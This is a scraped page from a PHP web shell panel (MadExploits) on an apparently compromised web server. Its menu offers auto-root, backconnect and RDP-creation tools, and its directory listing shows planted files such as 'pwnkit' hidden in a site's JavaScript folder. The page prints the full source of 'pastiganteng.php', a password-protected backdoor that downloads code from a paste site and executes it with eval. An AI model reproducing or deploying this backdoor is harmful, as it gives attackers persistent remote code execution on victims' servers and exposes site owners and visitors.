Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.226.93.22
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
kajri /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
aos.js
13.91
KB
-rwxr-xr-x
bootstrap-datepicker.min.js
33.37
KB
-rwxr-xr-x
bootstrap.min.js
49.84
KB
-rwxr-xr-x
gelay.txt
12.11
KB
-rw-r--r--
jquery-3.3.1.min.js
84.89
KB
-rwxr-xr-x
jquery-migrate-3.0.1.min.js
11.15
KB
-rwxr-xr-x
jquery-ui.js
44.73
KB
-rwxr-xr-x
jquery.countdown.min.js
5.21
KB
-rwxr-xr-x
jquery.easing.1.3.js
7.92
KB
-rwxr-xr-x
jquery.fancybox.min.js
66.6
KB
-rwxr-xr-x
jquery.magnific-popup.min.js
19.74
KB
-rwxr-xr-x
jquery.mb.YTPlayer.min.js
61.08
KB
-rwxr-xr-x
jquery.stellar.min.js
12.3
KB
-rwxr-xr-x
jquery.sticky.js
9.85
KB
-rwxr-xr-x
main.js
7.41
KB
-rwxr-xr-x
mediaelement-and-player.min.js
148.9
KB
-rwxr-xr-x
owl.carousel.min.js
41.76
KB
-rwxr-xr-x
pastiganteng.php
2.69
KB
-rw-r--r--
popper.min.js
19.86
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
slick.min.js
41.86
KB
-rwxr-xr-x
typed.js
11.42
KB
-rwxr-xr-x
wp-blog-header.php
4.57
KB
-r--r--r--
wp-cron.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pastiganteng.php
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['SAP'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = 'e96c610849c889e571516c345546e1da'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['SAP'] = 'janco'; // Replace this with your cookie data } else { // Password is incorrect echo "Incorrect password. Please try again."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://paste.ee/r/L9Dvo'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html> <head> <title>Seo TKP</title> </head> <body> <center> <img src="https://res.cloudinary.com/dbhs42bnh/image/upload/v1705292692/tumhiho.png" /> <body style="background-color:black;"> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Touch Me!"> </form> </center> </body> </html> <?php } ?>
Close